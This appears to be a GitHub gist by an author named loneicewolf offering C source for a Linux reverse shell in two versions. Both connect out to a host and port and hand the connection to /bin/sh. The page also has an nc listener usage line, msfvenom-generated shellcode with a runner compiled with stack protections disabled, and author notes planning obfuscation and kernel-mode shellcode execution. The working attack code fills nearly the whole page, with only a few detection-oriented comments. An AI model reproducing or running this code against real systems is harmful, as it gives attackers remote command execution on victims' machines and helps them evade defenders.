A compact linux reverse shell written in the C Programming Language.
/*
NOTE: See below for version 2 (and updates, errata, fixes, links, and so on).
NOTE: Don't assume this is the latest version just because it is first in the list; it's not.
Version 1, 'naive approach' (hard-coded values, etc.)
gcc -g -o L1 lin_1.c
*/
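#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

/* Hard-coded peer address, peer port and program for this "version 1" sample. */
#define RP 1234
#define RH "127.0.0.1"
#define BIN "/bin/sh"

/*
 * Connects a TCP socket to RH:RP, duplicates that socket onto descriptors
 * 0, 1 and 2, and then replaces the process image with BIN.
 *
 * Every step is checked. On failure the reason is reported on stderr and the
 * function returns 1 before anything is executed.
 *
 * What this leaves behind for an observer: a BIN process whose stdin, stdout
 * and stderr all refer to the same outbound TCP socket. That process/socket
 * relationship is what host telemetry can alert on, and the connect() below
 * is the point at which egress filtering applies.
 *
 * Returns 1 on any failure; does not return when execve() succeeds.
 */
int main(void)
{
    int is = socket(AF_INET, SOCK_STREAM, 0);
    if (is < 0) {
        perror("socket");
        return 1;
    }

    /* Zero the whole structure so sin_zero is not left uninitialized. */
    struct sockaddr_in s1 = {0};
    s1.sin_family = AF_INET;
    s1.sin_port = htons(RP);

    /*
     * inet_addr() reports errors with a value that is also a valid address;
     * inet_pton() has an unambiguous return code.
     */
    if (inet_pton(AF_INET, RH, &s1.sin_addr) != 1) {
        fprintf(stderr, "invalid IPv4 address: %s\n", RH);
        close(is);
        return 1;
    }

    if (connect(is, (struct sockaddr *)&s1, sizeof s1) < 0) {
        perror("connect");
        close(is);
        return 1;
    }

    for (int fd = 0; fd < 3; fd++) {
        if (dup2(is, fd) < 0) {
            perror("dup2");
            close(is);
            return 1;
        }
    }

    char *const argv[] = {BIN, NULL};
    /* An explicit empty environment; a NULL envp is a Linux-only extension. */
    char *const envp[] = {NULL};
    execve(BIN, argv, envp);

    /* Only reached when execve() failed; stderr is the socket by now. */
    perror("execve");
    return 1;
}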
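/*
Some options are not absolutely necessary but are included for future reference.
(-fno-stack-protector, -z execstack and -no-pie switch off the stack canary, the
non-executable stack and position-independent linking, so the resulting binary
runs without those mitigations.)
gcc lin_1.c -o L1 -fno-stack-protector -z execstack -no-pie -g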
msfvenom -p linux/x64/exec cmd="echo ABC \&\& echo XYZ" -f c -v sh_1 | |
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload | |
[-] No arch selected, selecting arch: x64 from the payload | |
No encoder specified, outputting raw payload | |
Payload size: 57 bytes | |
Final size of c file: 265 bytes | |
unsigned char sh_1[] = | |
"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52" | |
"\x66\x68\x2d\x63\x54\x5e\x52\xe8\x15\x00\x00\x00\x65\x63\x68" | |
"\x6f\x20\x41\x42\x43\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x58" | |
"\x59\x5a\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05"; | |
*/ | |
#include <stdio.h>
#include <unistd.h>

/*
 * Stores the payload bytes listed in the comment above (reported there as
 * 57 bytes, generated for linux/x64/exec with cmd "echo ABC && echo XYZ") in
 * a local array and transfers control to them through a function pointer.
 *
 * sh_1 is an automatic variable, so the bytes live in main's stack frame.
 * The call therefore depends on the stack being mapped executable, which is
 * what the "-z execstack" option on the build line requests; with a
 * non-executable stack the call faults instead of running the bytes.
 * A binary linked this way can be recognised by its GNU_STACK program header
 * carrying the execute flag (visible with `readelf -lW`).
 *
 * Converting a pointer to an object into a pointer to a function is not
 * defined by ISO C; this relies on the platform's behaviour.
 */
int main() {
    unsigned char sh_1[] =
        "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52"
        "\x66\x68\x2d\x63\x54\x5e\x52\xe8\x15\x00\x00\x00\x65\x63\x68"
        "\x6f\x20\x41\x42\x43\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x58"
        "\x59\x5a\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05";

    /* Name the entry point first, then call it; same cast as a one-liner. */
    void (*entry)() = (void (*)())sh_1;
    entry();

    return 0;
}
coming soon own encoder |
Author
loneicewolf
commented
Jan 27, 2023
- Note: this is kinda like the EXEC_LKM I did, but it doesn't have shellcode execution(yet)
- New update coming soon: Kernel mode Shellcode Execution
- See the MAIN GIT REPOS for UPDATES and ERRATAS (fixes) (like shellcode addons; examples; help, etc)
// msfvenom -p linux/x64/exec CMD="touch /tmp/WORKS" -f c
/*
No encoder specified, outputting raw payload
Payload size: 53 bytes
Final size of c file: 248 bytes
unsigned char buf[] =
"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f"
"\x52\x66\x68\x2d\x63\x54\x5e\x52\xe8\x11\x00\x00\x00\x74"
"\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x57\x4f\x52\x4b"
"\x53\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05";
*/
TODO:
- diff-ways-to
input
:
- [ ] ip,port,executable, and more - function, shellcode,
-[] other loops to obfuscate
Version 2 'Better'
// Version 2 - better, but still not as good as I want it to be. Namely, there are some (very obvious) flaws in this program.
// No error handling, for example. And no "verbose/debug" output.
// The BIN can't include any arguments (like, BIN="echo hello" won't work.)
/*
* ===== usage =====
*
* -----set up listener-----
* clear; nc -nvlp 1234
* #----------compile---------- ----------set env vars-------------------- -------run it-------
* clear; rm R;gcc -o R rsh.c && RP="1234" && RH="127.0.0.1" && BIN="/bin/sh" && ./R $RP $RH $BIN
*
*/
#include <stdarg.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
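/*
 * Version 2: takes the peer and the program from the command line.
 *
 *   argv[1]  TCP port, decimal, 1-65535
 *   argv[2]  IPv4 address in dotted-quad form
 *   argv[3]  path of the program to execute; it is handed to execve() as a
 *            single path, so it cannot carry arguments
 *
 * Connects a TCP socket to argv[2]:argv[1], duplicates it onto descriptors
 * 0, 1 and 2, and replaces the process image with argv[3].
 *
 * The arguments are validated before any of them is used: a missing
 * argument previously dereferenced a NULL argv entry, and atoi() accepted
 * any text as a port. Each system call is checked as well.
 *
 * What this leaves behind for an observer: a process running argv[3] whose
 * stdin, stdout and stderr all refer to the same outbound TCP socket.
 *
 * Returns 1 on any failure; does not return when execve() succeeds.
 */
int main(int argc, char **argv) {
    if (argc < 4) {
        fprintf(stderr, "usage: %s <port> <ipv4-address> <program>\n",
                argc > 0 ? argv[0] : "R");
        return 1;
    }

    /* strtol() with an end pointer rejects empty and trailing-garbage input. */
    char *end = NULL;
    long port = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || port < 1 || port > 65535) {
        fprintf(stderr, "invalid port: %s\n", argv[1]);
        return 1;
    }
    char *RH = argv[2];
    char *BIN = argv[3];

    int is = socket(AF_INET, SOCK_STREAM, 0);
    if (is < 0) {
        perror("socket");
        return 1;
    }

    /* Zero the whole structure so sin_zero is not left uninitialized. */
    struct sockaddr_in s1 = {0};
    s1.sin_family = AF_INET;
    s1.sin_port = htons((unsigned short)port);

    /*
     * inet_addr() reports errors with a value that is also a valid address;
     * inet_pton() has an unambiguous return code.
     */
    if (inet_pton(AF_INET, RH, &s1.sin_addr) != 1) {
        fprintf(stderr, "invalid IPv4 address: %s\n", RH);
        close(is);
        return 1;
    }

    if (connect(is, (struct sockaddr *)&s1, sizeof s1) < 0) {
        perror("connect");
        close(is);
        return 1;
    }

    for (int fd = 0; fd < 3; fd++) {
        if (dup2(is, fd) < 0) {
            perror("dup2");
            close(is);
            return 1;
        }
    }

    char *const A[] = {BIN, NULL};
    /* An explicit empty environment; a NULL envp is a Linux-only extension. */
    char *const envp[] = {NULL};
    execve(BIN, A, envp);

    /* Only reached when execve() failed; stderr is the socket by now. */
    perror("execve");
    return 1;
}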
UPCOMING 2 UPDATES
1
- Make both reverse shells (windows and linux) act as both a server and a client. How? 2 functions.
-
client(remote_port, remote_host, remote_binary)
-
server(listen_port)
-
2
- Add Cryptography/Steganography/Obfuscation to both of them. Namely:
- The tools Here - at embeddedsw.net (libObfuscate)